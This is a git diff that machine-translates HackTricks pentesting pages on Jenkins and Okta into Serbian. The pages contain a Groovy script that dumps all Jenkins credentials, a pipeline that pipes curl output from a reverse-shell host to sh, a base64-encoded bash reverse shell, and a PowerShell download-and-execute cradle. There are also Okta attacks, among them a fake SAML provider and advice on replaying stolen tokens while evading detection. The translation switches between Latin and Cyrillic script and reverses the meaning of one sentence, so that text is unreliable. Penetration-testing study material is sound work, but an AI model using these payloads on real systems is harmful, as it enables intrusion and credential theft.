+--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
+--header "Jenkins-Crumb: $CRUMB" \
+--header "Content-Type: application/x-www-form-urlencoded" \
+--data-urlencode "script=$SCRIPT"
+```
 
-  - Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
+- Groovy skripta može se koristiti za izvršavanje komandi na sistemskom nivou ili drugih operacija unutar Jenkins okruženja.
 
-The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely.
+Primer curl komande prikazan pokazuje kako napraviti zahtev ka Jenkins-u sa potrebnim zaglavljima i kolačićima za sigurno izvršavanje proizvoljnog koda.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
index 8699b8159..c6aa4c053 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
@@ -3,10 +3,9 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 > [!WARNING]
-> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
-
-You can **dump all the secrets from the Groovy Script console** in `/script` running this code
+> Imajte na umu da će ovi skripti samo prikazati tajne unutar `credentials.xml` datoteke, ali **datoteke za konfiguraciju gradnje** takođe mogu imati **više kredencijala**.
 
+Možete **izvući sve tajne iz Groovy Script konzole** u `/script` pokretanjem ovog koda
 ```java
 // From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
 import jenkins.model.*
@@ -42,52 +41,45 @@ showRow("something else", it.id, '', '', '')
 
 return
 ```
-
-#### or this one:
-
+#### или овај:
 ```java
 import java.nio.charset.StandardCharsets;
 def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
-      com.cloudbees.plugins.credentials.Credentials.class
+com.cloudbees.plugins.credentials.Credentials.class
 )
 
 for (c in creds) {
-  println(c.id)
-  if (c.properties.description) {
-    println("   description: " + c.description)
-  }
-  if (c.properties.username) {
-    println("   username: " + c.username)
-  }
-  if (c.properties.password) {
-    println("   password: " + c.password)
-  }
-  if (c.properties.passphrase) {
-    println("   passphrase: " + c.passphrase)
-  }
-  if (c.properties.secret) {
-    println("   secret: " + c.secret)
-  }
-  if (c.properties.secretBytes) {
-    println("    secretBytes: ")
-    println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
-    println("")
-  }
-  if (c.properties.privateKeySource) {
-    println("   privateKey: " + c.getPrivateKey())
-  }
-  if (c.properties.apiToken) {
-    println("   apiToken: " + c.apiToken)
-  }
-  if (c.properties.token) {
-    println("   token: " + c.token)
-  }
-  println("")
+println(c.id)
+if (c.properties.description) {
+println("   description: " + c.description)
+}
+if (c.properties.username) {
+println("   username: " + c.username)
+}
+if (c.properties.password) {
+println("   password: " + c.password)
+}
+if (c.properties.passphrase) {
+println("   passphrase: " + c.passphrase)
+}
+if (c.properties.secret) {
+println("   secret: " + c.secret)
+}
+if (c.properties.secretBytes) {
+println("    secretBytes: ")
+println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
+println("")
+}
+if (c.properties.privateKeySource) {
+println("   privateKey: " + c.getPrivateKey())
+}
+if (c.properties.apiToken) {
+println("   apiToken: " + c.apiToken)
+}
+if (c.properties.token) {
+println("   token: " + c.token)
+}
+println("")
 }
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
index 89ca15223..d386cb277 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
@@ -2,42 +2,36 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Creating a new Pipeline
+## Kreiranje novog Pipelines
 
-In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
+U "New Item" (dostupno na `/view/all/newJob`) izaberite **Pipeline:**
 
 ![](<../../images/image (235).png>)
 
-In the **Pipeline section** write the **reverse shell**:
+U **Pipeline sekciji** napišite **reverse shell**:
 
 ![](<../../images/image (285).png>)
-
 ```groovy
 pipeline {
-    agent any
+agent any
 
-    stages {
-        stage('Hello') {
-            steps {
-                sh '''
-                    curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
-                '''
-            }
-        }
-    }
+stages {
+stage('Hello') {
+steps {
+sh '''
+curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
+'''
+}
+}
+}
 }
 ```
-
-Finally click on **Save**, and **Build Now** and the pipeline will be executed:
+Na kraju kliknite na **Save**, i **Build Now** i pipeline će biti izvršen:
 
 ![](<../../images/image (228).png>)
 
-## Modifying a Pipeline
+## Modifikovanje Pipeline-a
 
-If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed.
+Ako možete pristupiti konfiguracionom fajlu nekog konfigurisanog pipeline-a, možete jednostavno **modifikovati ga dodajući svoj reverzni shell** i zatim ga izvršiti ili čekati da bude izvršen.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
index f16096070..08a41a725 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
@@ -4,37 +4,33 @@
 
 ## Creating a Project
 
-This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
+Ova metoda je veoma bučna jer morate da kreirate potpuno novi projekat (očigledno, ovo će raditi samo ako korisniku nije dozvoljeno da kreira novi projekat).
 
-1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
-2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._
-3. Click **Build now**
-   1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
-   2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`**
+1. **Kreirajte novi projekat** (Freestyle project) klikom na "New Item" ili u `/view/all/newJob`
+2. Unutar **Build** sekcije postavite **Execute shell** i nalepite powershell Empire launcher ili meterpreter powershell (može se dobiti korišćenjem _unicorn_). Pokrenite payload sa _PowerShell.exe_ umesto korišćenja _powershell._
+3. Kliknite na **Build now**
+1. Ako **Build now** dugme ne pojavljuje, još uvek možete otići na **configure** --> **Build Triggers** --> `Build periodically` i postaviti cron na `* * * * *`
+2. Umesto korišćenja crona, možete koristiti konfiguraciju "**Trigger builds remotely**" gde samo treba da postavite ime api tokena za pokretanje posla. Zatim idite na svoj korisnički profil i **generišite API token** (nazovite ovaj API token kao što ste nazvali api token za pokretanje posla). Na kraju, pokrenite posao sa: **`curl :@/job//build?token=`**
 
 ![](<../../images/image (165).png>)
 
 ## Modifying a Project
 
-Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
+Idite na projekte i proverite **da li možete da konfigurišete bilo koji** od njih (potražite "Configure button"):
 
 ![](<../../images/image (265).png>)
 
-If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others).
+Ako **ne možete** da vidite nijedno **konfiguraciono** **dugme** onda **ne možete** **konfigurisati** verovatno (ali proverite sve projekte jer možda možete da konfigurišete neke od njih, a ne druge).
 
-Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
+Ili **pokušajte da pristupite putanji** `/job//configure` ili `/me/my-views/view/all/job//configure` \_\_ u svakom projektu (primer: `/job/Project0/configure` ili `/me/my-views/view/all/job/Project0/configure`).
 
 ## Execution
 
-If you are allowed to configure the project you can **make it execute commands when a build is successful**:
+Ako vam je dozvoljeno da konfigurišete projekat, možete **učiniti da izvršava komande kada je build uspešan**:
 
 ![](<../../images/image (98).png>)
 
-Click on **Save** and **build** the project and your **command will be executed**.\
-If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
+Kliknite na **Save** i **build** projekat i vaša **komanda će biti izvršena**.\
+Ako ne izvršavate reverse shell već jednostavnu komandu, možete **videti izlaz komande unutar izlaza build-a**.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
index 33821cc03..90086d4e8 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
@@ -4,24 +4,21 @@
 
 ## Jenkins RCE with Groovy Script
 
-This is less noisy than creating a new project in Jenkins
-
-1. Go to _path_jenkins/script_
-2. Inside the text box introduce the script
+Ovo je manje bučno od kreiranja novog projekta u Jenkinsu
 
+1. Idite na _path_jenkins/script_
+2. Unutar tekstualnog okvira unesite skriptu
 ```python
 def process = "PowerShell.exe ".execute()
 println "Found text ${process.text}"
 ```
+Možete izvršiti komandu koristeći: `cmd.exe /c dir`
 
-You could execute a command using: `cmd.exe /c dir`
+U **linuxu** možete uraditi: **`"ls /".execute().text`**
 
-In **linux** you can do: **`"ls /".execute().text`**
-
-If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
-
-**Another useful groovy script** is (replace \[INSERT COMMAND]):
+Ako treba da koristite _navodnike_ i _jednostruke navodnike_ unutar teksta. Možete koristiti _"""PAYLOAD"""_ (trostruki dvostruki navodnici) da izvršite payload.
 
+**Još jedan koristan groovy skript** je (zamenite \[INSERT COMMAND]):
 ```python
 def sout = new StringBuffer(), serr = new StringBuffer()
 def proc = '[INSERT COMMAND]'.execute()
@@ -29,9 +26,7 @@ proc.consumeProcessOutput(sout, serr)
 proc.waitForOrKill(1000)
 println "out> $sout err> $serr"
 ```
-
-### Reverse shell in linux
-
+### Obrnuta ljuska u linuxu
 ```python
 def sout = new StringBuffer(), serr = new StringBuffer()
 def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
@@ -39,29 +34,20 @@ proc.consumeProcessOutput(sout, serr)
 proc.waitForOrKill(1000)
 println "out> $sout err> $serr"
 ```
+### Обратна љуска у Виндовсу
 
-### Reverse shell in windows
-
-You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
-
+Можете припремити HTTP сервер са PS обрнутом љуском и користити Jeking да је преузмете и извршите:
 ```python
 scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
 echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
 cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc 
 ```
-
 ### Script
 
-You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
-
-You can use MSF to get a reverse shell:
+Možete automatizovati ovaj proces sa [**ovim skriptom**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
 
+Možete koristiti MSF da dobijete reverznu ljusku:
 ```
 msf> use exploit/multi/http/jenkins_script_console
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/okta-security/README.md b/src/pentesting-ci-cd/okta-security/README.md
index e682996c2..22f833374 100644
--- a/src/pentesting-ci-cd/okta-security/README.md
+++ b/src/pentesting-ci-cd/okta-security/README.md
@@ -2,117 +2,113 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices.
+[Okta, Inc.](https://www.okta.com/) je prepoznata u sektoru upravljanja identitetom i pristupom zbog svojih rešenja zasnovanih na oblaku. Ova rešenja su dizajnirana da pojednostave i osiguraju autentifikaciju korisnika kroz različite moderne aplikacije. Ona su namenjena ne samo kompanijama koje žele da zaštite svoje osetljive podatke, već i programerima koji su zainteresovani za integraciju kontrola identiteta u aplikacije, veb usluge i uređaje.
 
-The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to:
+Glavna ponuda Okta je **Okta Identity Cloud**. Ova platforma obuhvata paket proizvoda, uključujući, ali ne ograničavajući se na:
 
-- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications.
-- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification.
-- **Lifecycle Management**: Automates user account creation, update, and deactivation processes.
-- **Universal Directory**: Enables centralized management of users, groups, and devices.
-- **API Access Management**: Secures and manages access to APIs.
+- **Single Sign-On (SSO)**: Pojednostavljuje pristup korisnika omogućavajući jedan set prijavnih podataka za više aplikacija.
+- **Multi-Factor Authentication (MFA)**: Povećava bezbednost zahtevajući više oblika verifikacije.
+- **Lifecycle Management**: Automatizuje procese kreiranja, ažuriranja i deaktivacije korisničkih naloga.
+- **Universal Directory**: Omogućava centralizovano upravljanje korisnicima, grupama i uređajima.
+- **API Access Management**: Osigurava i upravlja pristupom API-ima.
 
-These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena.
+Ove usluge zajednički imaju za cilj jačanje zaštite podataka i pojednostavljenje pristupa korisnicima, poboljšavajući i bezbednost i pogodnost. Svestranost Okta rešenja čini ih popularnim izborom u različitim industrijama, korisnim za velike kompanije, male firme i pojedinačne programere. Na poslednjem ažuriranju u septembru 2021. godine, Okta je priznata kao istaknuta entitet u oblasti upravljanja identitetom i pristupom (IAM).
 
 > [!CAUTION]
-> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**.
+> Glavni cilj Okta je da konfiguriše pristup različitim korisnicima i grupama za spoljne aplikacije. Ako uspete da **kompromitujete administratorske privilegije u Okta** okruženju, verovatno ćete moći da **kompromitujete sve druge platforme koje kompanija koristi**.
 
 > [!TIP]
-> To perform a security review of an Okta environment you should ask for **administrator read-only access**.
+> Da biste izvršili bezbednosni pregled Okta okruženja, trebali biste zatražiti **administratorski pristup samo za čitanje**.
 
-### Summary
+### Sažetak
 
-There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\
-These users can be inside **groups**.\
-There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)...
+Postoje **korisnici** (koji mogu biti **smešteni u Okta,** prijavljeni iz konfigurisanih **Identity Providers** ili autentifikovani putem **Active Directory** ili LDAP).\
+Ovi korisnici mogu biti unutar **grupa**.\
+Postoje i **autentifikatori**: različite opcije za autentifikaciju kao što su lozinka, i nekoliko 2FA kao što su WebAuthn, email, telefon, okta verify (mogu biti omogućeni ili onemogućeni)...
 
-Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
+Zatim, postoje **aplikacije** sinhronizovane sa Okta. Svaka aplikacija će imati neku **mapu sa Okta** za deljenje informacija (kao što su email adrese, imena...). Štaviše, svaka aplikacija mora biti unutar **Politike autentifikacije**, koja označava **potrebne autentifikatore** za korisnika da **pristupi** aplikaciji.
 
 > [!CAUTION]
-> The most powerful role is **Super Administrator**.
+> Najmoćnija uloga je **Super Administrator**.
 >
-> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**.
+> Ako napadač kompromituje Okta sa administratorskim pristupom, sve **aplikacije koje veruju Okta** će verovatno biti **kompromitovane**.
 
-## Attacks
+## Napadi
 
-### Locating Okta Portal
+### Lociranje Okta Portala
 
-Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**.
+Obično će portal kompanije biti lociran na **companyname.okta.com**. Ako nije, pokušajte jednostavne **varijacije** od **companyname.** Ako ne možete da ga pronađete, takođe je moguće da organizacija ima **CNAME** zapis kao **`okta.companyname.com`** koji upućuje na **Okta portal**.
 
-### Login in Okta via Kerberos
+### Prijava u Okta putem Kerberosa
 
-If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard.
+Ako je **`companyname.kerberos.okta.com`** aktivan, **Kerberos se koristi za pristup Okta**, obično zaobilazeći **MFA** za **Windows** korisnike. Da biste pronašli Kerberos-autentifikovane Okta korisnike u AD, pokrenite **`getST.py`** sa **odgovarajućim parametrima**. Nakon dobijanja **AD korisničkog tiketa**, **ubacite** ga u kontrolisani host koristeći alate kao što su Rubeus ili Mimikatz, osiguravajući da je **`clientname.kerberos.okta.com` u "Intranet" zoni Internet opcija**. Pristup određenom URL-u trebao bi da vrati JSON "OK" odgovor, što ukazuje na prihvatanje Kerberos tiketa, i omogućava pristup Okta kontrolnoj tabli.
 
-Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta.
+Kompromitovanje **Okta servisnog naloga sa delegacijom SPN omogućava Silver Ticket napad.** Međutim, korišćenje **AES** za enkripciju tiketa zahteva posedovanje AES ključa ili lozinke u običnom tekstu. Koristite **`ticketer.py` da generišete tiket za korisnika žrtve** i isporučite ga putem pregledača da biste se autentifikovali sa Okta.
 
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Proverite napad u** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
 
-### Hijacking Okta AD Agent
+### Otimanje Okta AD Agenta
 
-This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key').
+Ova tehnika uključuje **pristupanje Okta AD Agentu na serveru**, koji **sinhronizuje korisnike i upravlja autentifikacijom**. Istražujući i dekriptovanjem konfiguracija u **`OktaAgentService.exe.config`**, posebno AgentToken koristeći **DPAPI**, napadač može potencijalno **presresti i manipulisati podacima o autentifikaciji**. Ovo omogućava ne samo **praćenje** i **hvatanje korisničkih podataka** u običnom tekstu tokom Okta procesa autentifikacije, već i **odgovaranje na pokušaje autentifikacije**, čime se omogućava neovlašćen pristup ili pružanje univerzalne autentifikacije putem Okta (slično 'skeleton key').
 
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Proverite napad u** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
 
-### Hijacking AD As an Admin
+### Otimanje AD kao Administrator
 
-This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment.
+Ova tehnika uključuje otimanje Okta AD Agenta prvo dobijanjem OAuth Koda, a zatim traženjem API tokena. Token je povezan sa AD domenom, a **konektor je imenovan da uspostavi lažni AD agent**. Inicijalizacija omogućava agentu da **obrađuje pokušaje autentifikacije**, hvatajući podatke putem Okta API-ja. Alati za automatizaciju su dostupni za pojednostavljenje ovog procesa, nudeći besprekornu metodu za presretanje i rukovanje podacima o autentifikaciji unutar Okta okruženja.
 
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Proverite napad u** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
 
-### Okta Fake SAML Provider
+### Lažni Okta SAML Pružalac
 
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Proverite napad u** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
 
-The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner.
+Tehnika uključuje **implementaciju lažnog SAML pružaoca**. Integracijom spoljnog Identity Providera (IdP) unutar Okta okvira koristeći privilegovani nalog, napadači mogu **kontrolisati IdP, odobravajući bilo koji zahtev za autentifikaciju po želji**. Proces podrazumeva postavljanje SAML 2.0 IdP u Okta, manipulaciju IdP Single Sign-On URL-om za preusmeravanje putem lokalnog hosts fajla, generisanje samopotpisanog sertifikata i konfiguraciju Okta postavki da se podudaraju sa korisničkim imenom ili email-om. Uspešno izvršavanje ovih koraka omogućava autentifikaciju kao bilo koji Okta korisnik, zaobilazeći potrebu za pojedinačnim korisničkim podacima, značajno povećavajući kontrolu pristupa na potencijalno neprimetan način.
 
-### Phishing Okta Portal with Evilgnix
+### Phishing Okta Portala sa Evilgnix
 
-In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal.
+U [**ovom blog postu**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) objašnjeno je kako pripremiti phishing kampanju protiv Okta portala.
 
-### Colleague Impersonation Attack
+### Napad imitacije kolege
 
-The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**.
+**atributi koje svaki korisnik može imati i modifikovati** (kao što su email ili ime) mogu se konfigurisati u Okta. Ako je **aplikacija** **pouzdana** kao ID **atribut** koji korisnik može **modifikovati**, moći će da **imitira druge korisnike na toj platformi**.
 
-Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change).
+Stoga, ako aplikacija veruje polju **`userName`**, verovatno nećete moći da ga promenite (jer obično ne možete promeniti to polje), ali ako veruje na primer **`primaryEmail`** možda ćete moći da **promenite na email adresu kolege** i imitirati ga (trebaće vam pristup email-u i da prihvatite promenu).
 
-Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\
-Therefore, the app should have this field enabled if it exists:
+Napomena da ova imitacija zavisi od toga kako je svaka aplikacija konfigurisana. Samo one koje veruju polju koje ste modifikovali i prihvataju ažuriranja će biti kompromitovane.\
+Stoga, aplikacija treba da ima ovo polje omogućeno ako postoji:
 
 

 
-I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently).
+Takođe sam video druge aplikacije koje su bile ranjive, ali nisu imale to polje u Okta postavkama (na kraju, različite aplikacije su konfigurisane različito).
 
-The best way to find out if you could impersonate anyone on each app would be to try it!
+Najbolji način da saznate da li možete imitirati nekoga na svakoj aplikaciji bio bi da probate!
 
-## Evading behavioural detection policies 
+## Izbegavanje politika detekcije ponašanja 
 
-Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page.
+Politike detekcije ponašanja u Okta možda su nepoznate dok se ne susretnete s njima, ali **zaobilaženje** njih može se postići **ciljanjem Okta aplikacija direktno**, izbegavajući glavnu Okta kontrolnu tablu. Sa **Okta pristupnim tokenom**, ponovo upotrebite token na **URL-u specifičnom za aplikaciju Okta** umesto na glavnoj stranici za prijavu.
 
-Key recommendations include:
+Ključne preporuke uključuju:
 
-- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens.
-- Ensure **consistent user-agent strings** between the client and replayed access tokens.
-- **Refrain from replaying** tokens from different users from the same IP address.
-- Exercise caution when replaying tokens against the Okta dashboard.
-- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic.
+- **Izbegavajte korišćenje** popularnih anonimnih proksija i VPN usluga prilikom ponovnog korišćenja uhvaćenih pristupnih tokena.
+- Osigurajte **dosledne user-agent stringove** između klijenta i ponovo korišćenih pristupnih tokena.
+- **Izbegavajte ponovnu upotrebu** tokena od različitih korisnika sa iste IP adrese.
+- Budite oprezni prilikom ponovnog korišćenja tokena protiv Okta kontrolne table.
+- Ako ste svesni IP adresa kompanije žrtve, **ograničite saobraćaj** na te IP adrese ili njihov opseg, blokirajući sav ostali saobraćaj.
 
-## Okta Hardening
+## Okta Ojačavanje
 
-Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible:
+Okta ima mnogo mogućih konfiguracija, na ovoj stranici ćete pronaći kako da ih pregledate kako bi bile što sigurnije:
 
 {{#ref}}
 okta-hardening.md
 {{#endref}}
 
-## References
+## Reference
 
 - [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers)
 - [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/okta-security/okta-hardening.md b/src/pentesting-ci-cd/okta-security/okta-hardening.md
index a7dac96a7..6633d8aab 100644
--- a/src/pentesting-ci-cd/okta-security/okta-hardening.md
+++ b/src/pentesting-ci-cd/okta-security/okta-hardening.md
@@ -6,72 +6,72 @@
 
 ### People
 
-From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs).
+Iz perspektive napadača, ovo je veoma zanimljivo jer ćete moći da vidite **sve registrovane korisnike**, njihove **email** adrese, **grupe** kojima pripadaju, **profile** i čak **uređaje** (mobilne telefone zajedno sa njihovim OS-ovima).
 
-For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**".
+Za pregled u beloj kutiji proverite da nema više od nekoliko "**Pending user action**" i "**Password reset**".
 
 ### Groups
 
-This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\
-It's possible to see the **people included inside groups** and **apps assigned** to each group.
+Ovde možete pronaći sve kreirane grupe u Okta. Zanimljivo je razumeti različite grupe (set **dozvola**) koje mogu biti dodeljene **korisnicima**.\
+Moguće je videti **ljude uključene u grupe** i **aplikacije dodeljene** svakoj grupi.
 
-Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members.
+Naravno, svaka grupa sa imenom **admin** je zanimljiva, posebno grupa **Global Administrators**, proverite članove da saznate ko su najprivilegovaniji članovi.
 
-From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3).
+Iz pregleda u beloj kutiji, **ne bi trebalo da bude više od 5 globalnih admina** (bolje je ako ih ima samo 2 ili 3).
 
 ### Devices
 
-Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not.
+Ovde pronađite **listu svih uređaja** svih korisnika. Takođe možete videti da li se **aktivno upravlja** njima ili ne.
 
 ### Profile Editor
 
-Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**.
